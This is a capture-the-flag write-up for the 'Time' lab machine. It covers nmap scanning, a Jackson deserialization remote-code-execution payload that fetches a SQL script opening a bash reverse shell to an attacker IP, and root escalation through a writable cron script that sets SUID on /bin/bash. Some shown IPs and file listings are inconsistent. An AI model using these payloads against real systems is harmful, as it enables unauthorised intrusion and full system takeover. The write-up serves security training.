Time

Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.214 -oN allPorts

• -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

• --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

• -p- scanning the entire port range, from 1 to 65535.

• -T5 insane mode, it is the fastest mode of the nmap time template.

• -Pn assume the host is online.

• -n scan without reverse DNS resolution.

• -oN save the scan result into a file, in this case the allports file.

# Nmap 7.92 scan initiated Mon May 16 14:32:59 2022 as: nmap -sS -p- -T5 --min-rate 5000 -n -Pn -oN allPorts 10.10.10.214
Warning: 10.10.10.214 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.214
Host is up (0.27s latency).
Not shown: 62265 closed tcp ports (reset), 3268 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

# Nmap done at Mon May 16 14:33:25 2022 -- 1 IP address (1 host up) scanned in 25.70 seconds

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p22,80 10.10.10.214 -oN targeted

• -sC performs the scan using the default set of scripts.

• -sV enables version detection.

• -oN save the scan result into file, in this case the targeted file.

# Nmap 7.92 scan initiated Mon May 16 14:33:41 2022 as: nmap -sCV -p22,80 -Pn -oN targeted 10.10.10.214
Nmap scan report for 10.10.10.214
Host is up (0.037s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 0f:7d:97:82:5f:04:2b:e0:0a:56:32:5d:14:56:82:d4 (RSA)
|   256 24:ea:53:49:d8:cb:9b:fc:d6:c4:26:ef:dd:34:c1:1e (ECDSA)
|_  256 fe:25:34:e4:3e:df:9f:ed:62:2a:a4:93:52:cc:cd:27 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Online JSON parser
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon May 16 14:33:52 2022 -- 1 IP address (1 host up) scanned in 10.76 seconds

Let's take a look at the website.

Exploitation

If we insert some JSON code, the tool will beautify it, and show it in the output.

Also, we have the Validate (beta!) option. And if we press on the PROCESS button without any input, we'll get the following Java error.

Validation failed: Unhandled Java exception: com.fasterxml.jackson.databind.exc.MismatchedInputException: No content to map due to end-of-input

The error seems to be a Jackson error. If you do some research, you'll find this post, explaining that you can have an RCE (Remote Code Execution) with this tool.

Jackson is a high-performance JSON processor for Java. Its developers extol the combination of fast, correct, lightweight, and ergonomic attributes of the library.

First, let's create a file called exploit.sql that contains the following code, which will send us a reverse shell. Make sure to change the IP address.

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
        String[] command = {"bash", "-c", cmd};
        java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
        return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('bash -i >& /dev/tcp/10.10.14.7/4444 0>&1')

Now, let's set a simple HTTP server with python on the directory where the exploit.sql is.

python -m http.server 80

Then, let's set a netcat listener on port 4444 with netcat.

nc -lvnp 4444

• -l listen mode.

• -v verbose mode.

• -n numeric-only IP, no DNS resolution.

• -p specify the port to listen on.

Finally, if we put the following payload on the input, and press on the PROCESS button, it will download the exploit.sql file from our HTTP server, and it will send as a reverse shell as the pericles user. Then, we could grab the user flag.

["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.14.2/exploit.sql'"}]

listening on [any] 4444 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.214] 40022
bash: cannot set terminal process group (830): Inappropriate ioctl for device
bash: no job control in this shell
pericles@time:/var/www/html$ whoami
pericles
pericles@time:/var/www/html$ cat /home/pericles/user.txt
9af68172bde222c6490a2ddecea6e26f

Privilege Escalation

First, let's set an interactive TTY shell.

script /dev/null -c /bin/bash

Then I press Ctrl+Z and execute the following command on my local machine:

stty raw -echo; fg

reset

Terminal type? xterm

Next, I export a few variables:

export TERM=xterm

export SHELL=bash

Finally, I run the following command in our local machine:

stty size

51 236

And set the proper dimensions in the victim machine:

stty rows 51 columns 236

At this point, I tried to look for scheduled tasks on the system with the pspy tool. Let's transfer pspy to the time machine.

pspy is a command line tool designed to snoop on processes without need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute.

https://github.com/DominicBreuker/pspy

python -m http.server

Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

On the time machine, go to the /tmp directory, download the binary, and give it execution permissions.

cd /tmp

wget http://10.10.14.2:8000/pspy64

chmod +x pspy64

If we execute the tool, we'll see at some point that the root user, with the UID set to 0, is executing the /usr/bin/timer_backup.sh script.

./pspy64

pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855                                        
                                                                                                                     
                                                                                                                     
     ██▓███    ██████  ██▓███ ▓██   ██▓                                                                              
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒                                                                              
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░                                                                              
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░                                                                              
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░                                                                              
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒                                                                               
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░                                                                               
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░                                                                                
                   ░           ░ ░                                                                                   
                               ░ ░                                                                                   
                                                                                                                     
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)                                                                                                                    
Draining file system events due to startup...                                                                        
done 
2022/05/17 14:04:21 CMD: UID=0    PID=9299   | /bin/bash /usr/bin/timer_backup.sh

If we see the permissions of that file, we'll see that we can modify it.

ls -l /usr/bin/timer_backup.sh

-rwxrw-rw- 1 pericles pericles 88 May 17 14:05 /usr/bin/timer_backup.sh

Let's change the script, so that when the root user execute it, the /bin/bash binary, we'll get the SUID permission, and we'll be able to get a shell as root.

nano /usr/bin/timer_backup.sh

#!/bin/bash
zip -r website.bak.zip /var/www/html && mv website.bak.zip /root/backup.zip
chmod +s /bin/bash

Finally, if we wait for a bit, we'll see that the bash binary will get the SUID permission.

ls -l /usr/bin/timer_backup.sh

-rwsrw-rw- 1 pericles pericles 88 May 17 14:05 /usr/bin/timer_backup.sh

Then, all we have to do is execute bash with root permission, and reap the harvest and take the root flag.

bash -p

bash-5.0# whoami
root
bash-5.0# cat /root/root.txt 
0686ddeee91a1bd540194e50662306be